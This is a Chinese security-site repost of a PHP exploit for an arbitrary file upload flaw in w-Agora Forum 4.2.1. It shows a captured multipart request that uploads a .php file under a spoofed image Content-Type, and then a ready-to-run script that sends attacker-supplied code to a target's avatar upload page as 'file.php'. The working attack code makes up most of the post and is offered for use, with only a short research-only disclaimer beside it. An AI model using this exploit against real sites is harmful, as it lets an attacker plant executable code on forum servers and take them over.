W - Agora 的论坛 4.2.1 任意文件上传漏洞

2021年4月3日19:43:04评论50 views字数 3845阅读12分49秒阅读模式

php
/*
Title .......................: w-Agora Forum 4.2.1 Remote File Upload Exploit
Site ........................: http://www.w-agora.com/en/download.php
Version .....................: 4.2.1

Author ......................: Treasure Priyamal
Site ........................: http://treasuresec.com
E-mail ......................: treasure[at]treasuresec.com

Discription
===========
w-Agora avatar upload option has content file detect option , but it can be replace with simply editing
POST Request from your browser

Here is a dump from Temp-Data I editied while im upload the File. Just simply replacing the Content-Type
you will be able to upload your script

6:28:18.073[118ms][total 3862ms] Status: 200[OK]
POST http://localhost/w-agora/browse_avatar.php Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html]
   Request Headers:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,/*;q=0.8]
      Accept-Language[en-us,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      Accept-Charset[ISO-8859-1,utf-8;q=0.7,*;q=0.7]
      Keep-Alive[115]
      Connection[keep-alive]
      Referer[http://localhost/w-agora/browse_avatar.php?site=localhost]
      Cookie[wa_lang=en; WAS_localhost_test=LastVisit%3D1306715684%26ThisVisit%3D1306715918%26visited%3D1306672722%2B; WAP_localhost_test=Visits%3D1%26LastVisit%3D1306715684; localhost_test_sort=newest; WAP_localhost_auth=lastVisit%3D1306715682%26uid%3Dtest%26pw%3D098f6bcd4621d373cade4e832627b4f6; localhost_auth=lastVisit%3D1306715998%26uid%3Dtest%26pw%3D098f6bcd4621d373cade4e832627b4f6]
   Post Data:
      POST_DATA[-----------------------------76401208715012
Content-Disposition: form-data; name="site"

localhost
-----------------------------76401208715012
Content-Disposition: form-data; name="submitted"

true
-----------------------------76401208715012
Content-Disposition: form-data; name="perpage"

20
-----------------------------76401208715012
Content-Disposition: form-data; name="first"

0
-----------------------------76401208715012
Content-Disposition: form-data; name="avatar"; filename="echo.php"
Content-Type: image/jpeg

-----------------------------76401208715012
Content-Disposition: form-data; name="submit"

Copy file
-----------------------------76401208715012--
]
   Response Headers:
      Date[Mon, 30 May 2011 00:58:18 GMT]
      Server[Apache/2.2.11 (Win32) PHP/5.3.0]
      X-Powered-By[PHP/5.3.0]
      Keep-Alive[timeout=5, max=100]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html]

if(count($argv) == 5)
{
    echo "nn";
    echo "+---------------------------------------------------------------+rn";
    echo "|        w-Agora Forum 4.2.1 Remote File Upload Exploit          |rn";
    echo "|                   Treasure Security                            |rn";
    echo "|                 by Treasure Priyamal                           |rn";
    echo "|        Usage: php exploit.php site.com /path/ user pass        |rn";
    echo "+---------------------------------------------------------------+rn";
    echo "n";

    echo "Code to write in the file (ie. ) :rnn";
    $code     =   trim(fgets(STDIN));

    $socket   =   @fsockopen($argv[1], 80, $eno, $estr, 30);
    if(!$socket)
    {
        die("Could not connect to ".$argv[1].". Operation aborted.");
    }

    $part1      =   "POST http://192.168.1.101/w-agora/browse_avatar.php?site=localhost HTTP/1.1rn";
    $part1     .=   "Host: " . $argv[1] . "rn";
    $part1     .=   "User-Agent : Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1rn";
    $part1     .=   "Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
    $part1     .=   "Connection: keep-alivern";
    $part1     .=   "Accept-Language : en-us,en;q=0.5rn";
    $part1     .=   "Referer :localhost/w-agora/browse_avatar.php?site=localhostrn";
    $part1     .=   "Cookie : wa_lang=enrn";

    $part1     .=   "Content-Type : multipart/form-data; boundary=---------------------------14695017222113685839218008876rn";
    $part2      =   "-----------------------------14695017222113685839218008876rn";
    $part2     .=   "Content-Disposition: form-data; name="site"rn";
    $part2     .=   "localhostrn";
    $part2     .=   "-----------------------------14695017222113685839218008876rn";
    $part2     .=   "Content-Disposition: form-data; name="submitted"rn";
    $part2     .=   "truern";
    $part2     .=   "-----------------------------14695017222113685839218008876rn";
    $part2     .=   "Content-Disposition: form-data; name="perpage"rn";
    $part2     .=   "20rn";
    $part2     .=   "-----------------------------14695017222113685839218008876rn";
    $part2     .=   "Content-Disposition: form-data; name="first"rn";
    $part2     .=   "0rn";
    $part2     .=   "-----------------------------14695017222113685839218008876rn";
    $part2     .=   "Content-Disposition: form-data; name="avatar"; filename="file.php"rn";
    $part2     .=   "Content-Type: image/gifrn"; // this is where the magic happens
    $part2     .=   $code."rn";
    $part2     .=   "-----------------------------14695017222113685839218008876rn";
    $part2     .=   "Content-Disposition: form-data; name="Submit"rn";
    $part2     .=   "Copy filern";
    $part2     .=   "-----------------------------14695017222113685839218008876rn";

    $part1     .=   "Content-Length: " . strlen($part2) . "rnrn";
    $part1     .=   $part2;

fwrite($socket, $part1);

    echo "check the upload folder";

}
else
{
    echo "nn";
    echo "+---------------------------------------------------------------+rn";
    echo "|        w-Agora Forum 4.2.1 Remote File Upload Exploit         |rn";
    echo "|                   Treasure Security                            |rn";
    echo "|        by Treasure Priyamal                                    |rn";
    echo "+---------------------------------------------------------------+rn";
    echo "|        Usage: php exploit.php site.com /path/ user pass       |rn";
    echo "+---------------------------------------------------------------+rn";
    echo "nn";
}
?>

文章来源于lcx.cc:W - Agora 的论坛 4.2.1 任意文件上传漏洞

相关推荐: “巨人网络”是否和黑客分成？

“我们受害人的QQ群里共113人，除3个人的钱是被转到另一个网游平台之外，其余110人均被转到巨人网络，光我们这些人的金额就有262万之多。 ”记者联系到本市一名受害人沈先生，他向记者讲述了事件经过，并讲了自己的一些推测。推测一：“2011年，徐州警方曾破获…

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

W - Agora 的论坛 4.2.1 任意文件上传漏洞

Php安全新闻早8点（2011-11-17 星期四） - 技术文章

黑客组织与墨西哥毒贩对峙取胜被绑成员已获释

PageAdmin cms getshell 0day - 脚本漏洞

UFO造访水星视频遭网友曝光美天文学家否认

WordPress 注入检查脚本 - 脚本漏洞

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

深山网站管理系统漏洞 - 脚本漏洞

【Php】ABCMS新闻发布系统漏洞 - 脚本漏洞

德清洁工误将艺术品当灰尘擦干净致损失80万欧元

德新型单人飞行器试飞成功

发表评论

在线咨询

微信